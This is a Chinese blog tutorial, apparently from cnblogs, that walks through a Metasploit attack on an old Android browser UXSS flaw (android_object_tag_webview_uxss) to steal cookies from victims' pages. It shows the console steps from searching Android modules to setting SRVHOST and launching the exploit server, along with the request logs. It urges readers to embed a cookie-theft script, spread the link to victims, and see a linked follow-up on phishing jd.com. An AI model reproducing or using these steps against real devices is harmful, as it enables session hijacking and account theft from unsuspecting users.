• 利用Android的UXSS漏洞完成一次XSS攻击


    黑客攻击的方式思路是先搜集信息,定位漏洞,然后针对不同的漏洞采用不同的方式来黑掉你。下面用metasploit模拟一次跨站脚本攻击(黑掉自己的手机)。

    1.搜集信息

    msf > search android
    
    Matching Modules
    ================
    
       Name                                                       Disclosure Date  Rank       Description
       ----                                                       ---------------  ----       -----------
       auxiliary/admin/android/google_play_store_uxss_xframe_rce                   normal     Android Browser RCE Through Google Play Store XFO
       auxiliary/gather/android_browser_new_tab_cookie_theft                       normal     Android Browser "Open in New Tab" Cookie Theft
       auxiliary/gather/android_htmlfileprovider                                   normal     Android Content Provider File Disclosure
       auxiliary/gather/android_object_tag_webview_uxss           2014-10-04       normal     Android Open Source Platform (AOSP) Browser UXSS
       auxiliary/gather/android_stock_browser_uxss                                 normal     Android Open Source Platform (AOSP) Browser UXSS
       auxiliary/scanner/sip/sipdroid_ext_enum                                     normal     SIPDroid Extension Grabber
       exploit/android/browser/samsung_knox_smdm_url              2014-11-12       normal     Samsung Galaxy KNOX Android Browser RCE
       exploit/android/browser/webview_addjavascriptinterface     2012-12-21       normal     Android Browser and WebView addJavascriptInterface Code Execution
       exploit/android/fileformat/adobe_reader_pdf_js_interface   2014-04-13       good       Adobe Reader for Android addJavascriptInterface Exploit
       exploit/android/local/futex_requeue                        2014-05-03       excellent  Android 'Towelroot' Futex Requeue Kernel Exploit
       exploit/multi/handler                                                       manual     Generic Payload Handler
       payload/android/meterpreter/reverse_http                                    normal     Android Meterpreter, Dalvik Reverse HTTP Stager
       payload/android/meterpreter/reverse_https                                   normal     Android Meterpreter, Dalvik Reverse HTTPS Stager
       payload/android/meterpreter/reverse_tcp                                     normal     Android Meterpreter, Dalvik Reverse TCP Stager
       payload/android/shell/reverse_http                                          normal     Command Shell, Dalvik Reverse HTTP Stager
       payload/android/shell/reverse_https                                         normal     Command Shell, Dalvik Reverse HTTPS Stager
       payload/android/shell/reverse_tcp                                           normal     Command Shell, Dalvik Reverse TCP Stager

    可以看到安卓可以利用的漏洞有很多,在这里我选择了一个UXSS(通用跨站脚本攻击)的漏洞,通过搜索,可以看到漏洞的具体描述。 

    这个漏洞的大概意思是如果黑客成功,将从你的浏览器中获取到你页面的cookie。

    2.接下来利用这个漏洞,并查看该模块的选项。

    msf > use auxiliary/gather/android_object_tag_webview_uxss
    msf auxiliary(android_object_tag_webview_uxss) > show options
    
    Module options (auxiliary/gather/android_object_tag_webview_uxss):
    
       Name         Current Setting     Required  Description
       ----         ---------------     --------  -----------
       CUSTOM_JS                        no        A string of javascript to execute in the context of the target URLs.
       REMOTE_JS                        no        A URL to inject into a script tag in the context of the target URLs.
       SRVHOST      0.0.0.0             yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
       SRVPORT      8080                yes       The local port to listen on.
       SSL          false               no        Negotiate SSL for incoming connections
       SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
       TARGET_URLS  http://example.com  yes       The comma-separated list of URLs to steal.
       URIPATH                          no        The URI to use for this exploit (default is random)
    
    
    Auxiliary action:
    
       Name       Description
       ----       -----------
       WebServer  

    由上图可以看到必填字段有SRVHOST/SRVPORT/TARGET_URLS。这里才是关键。在这一步里,你需要做的就是搭建自己的站点,以及把获取cookie并传回的脚本嵌入进去!

    在这里我除了SRVHOST外其他选择默认值,只起演示作用。(后边我会给出一个具体的例子,看别人的XSS是怎么做的)

    msf auxiliary(android_object_tag_webview_uxss) > set SRVHOST 192.168.1.106
    SRVHOST => 192.168.1.106

    3.假设你的脚本已经站点已经搞定,接下来输入“exploit”,服务启动后基本快要大功告成了。

    msf auxiliary(android_object_tag_webview_uxss) > exploit 
    [*] Auxiliary module execution completed
    msf auxiliary(android_object_tag_webview_uxss) > 
    [*] Using URL: http://192.168.1.106:8080/ORvS7Li6X
    [*] Server started.

    4.接下来,你需要想办法把你的站点扩散出去,然后坐享其成就行了。

    [*] 192.168.1.105    android_object_tag_webview_uxss - Request 'GET /ORvS7Li6X'
    [*] 192.168.1.105    android_object_tag_webview_uxss - Sending initial HTML ...
    [*] 192.168.1.105    android_object_tag_webview_uxss - Request 'GET /ORvS7Li6X'
    [*] 192.168.1.105    android_object_tag_webview_uxss - Sending initial HTML ...

    后记:这篇博客里对脚本制作思路和过程并没有深入探讨,具体思路可以借鉴一下这篇文章。

    实战利用XSS漏洞对me.jd.com进行基础验证钓鱼

         

  • 相关阅读:
    排列数组所有情况
    查到的结果的某个字段在一串字符串之中
    element组件化跳转和路由式跳转
    vue路由and组件操作
    事件 绑定,取消冒泡,拖拽 ,点击,事件委托习题
    窗口属性 和DOM 元素尺寸位置 及习题加强
    DOM树的增删改查 和 Date定时任务
    JS DOM 初做了解,习题笔记
    struts配置及检验
    第一个JSP登录跳转
  • 原文地址:https://www.cnblogs.com/alexkn/p/4719616.html
Copyright © 2020-2023  润新知